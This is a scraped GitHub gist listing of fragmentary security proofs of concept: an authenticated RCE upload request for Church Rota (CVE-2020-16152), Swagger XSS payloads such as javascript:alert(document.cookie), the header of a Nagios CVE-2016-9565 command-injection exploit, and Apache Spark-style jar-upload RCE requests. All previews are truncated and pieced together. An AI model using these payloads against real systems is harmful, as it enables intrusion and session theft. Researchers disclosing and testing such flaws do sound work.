POST /login.php5 HTTP/1.1
Accept: application/json
Connection: close
Content-Length: 100
Content-Type: application/json
{
"login_auth": 0,
"miniHiveUI": 1,
pikpikcu
/ ev-sites.txt
Created
March 24, 2021 06:38
— forked from ScottHelme/ev-sites.txt
Sites using EV in the Top 1 Million - 13th Sep 2019
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| 14 apple.com | |
| 40 vk.com | |
| 44 github.com | |
| 49 tumblr.com | |
| 55 dropbox.com | |
| 85 medium.com | |
| 87 paypal.com | |
| 92 icloud.com | |
| 100 booking.com | |
| 112 weebly.com |
pikpikcu
/ CVE-2020-16152.md
Created
March 8, 2021 03:59
Church Rota version 2.6.4 is vulnerable to authenticated remote code execution. The user does not need to have file upload permission in order to upload and execute an arbitrary file.
POST /resources.php?action=newsent HTTP/1.1
Host: 192.168.43.187
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: id,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------36504512417128952451539028145
Content-Length: 526
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| swagger: '2.0' | |
| info: | |
| title: Swagger Test | |
| description: <img src=x onerror=\"alert(document.domain)\"> | |
| default: <script>console.log(‘000000000000000000dad0000000000000000000');</script> | |
| license: | |
| name: BSD | |
| url: <img src=x onerror=\"alert(document.domain)\"> | |
| version: '30' | |
| produces: |
pikpikcu
/ swagerxss1.json
Created
February 23, 2021 11:22
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| swagger: "2.0", | |
| info: | |
| title: "Swagger Test Poc XSS", | |
| description: "Please to click Terms of service" | |
| termsOfService: "javascript:alert(document.cookie)" | |
| contact: | |
| name: "API Support", | |
| url: "javascript:alert(document.cookie)", | |
| email: "javascript:alert(document.cookie)" | |
| version: "1.0.1" |
pikpikcu
/ swagerxss.json
Last active
December 1, 2022 06:51
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| { | |
| "swagger": "2.0", | |
| "info": { | |
| "title": "Swagger Test Poc XSS", | |
| "description": "Please to click Terms of service", | |
| "termsOfService": "javasript:alert(document.domain)", | |
| "version": "1.0.1" | |
| }, | |
| "basePath": "/v1", | |
| "schemes": [ |
pikpikcu
/ nagios_cmd_injection.py
Created
February 15, 2021 09:22
— forked from xl7dev/nagios_cmd_injection.py
Nagios Exploit Command Injection CVE-2016-9565
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/env python | |
| intro = """\033[94m | |
| Nagios Core < 4.2.0 Curl Command Injection PoC Exploit (CVE-2016-9565) | |
| nagios_cmd_injection.py ver. 1.0 | |
| Discovered & Coded by: | |
| Dawid Golunski | |
| https://legalhackers.com | |
| \033[0m |
pikpikcu
/ pacs_vuln_report.md
Created
February 8, 2021 01:07
— forked from leommxj/pacs_vuln_report.md
- vendor page: https://pacsone.net/
- patched version: 7.1.1
- Credits: Xinjie Ma from Chaitin Research Lab
- 2020.07.19 send report to a vendor's partner
- 2020.07.20 they inform the real vendor
pikpikcu
/ Apache-Sprak-RCE.md
Created
February 6, 2021 08:16
Apache Sprak RCE
POST /v1/submissions/create HTTP/1.1
Host: ip:8081
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0
Content-Length: 619
Content-Type: application/json;charset=UTF-8
Accept-Encoding: gzip
{
POST /jars/upload HTTP/1.1
Host: REDACTED:8081
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0
Content-Length: 187
Content-Type: multipart/form-data;boundary=8ce4b16b22b58894aa86c421e8759df3
Accept-Encoding: gzip
--8ce4b16b22b58894aa86c421e8759df3
Content-Disposition: form-data; name="jarfile";filename="pikpikcu.jar"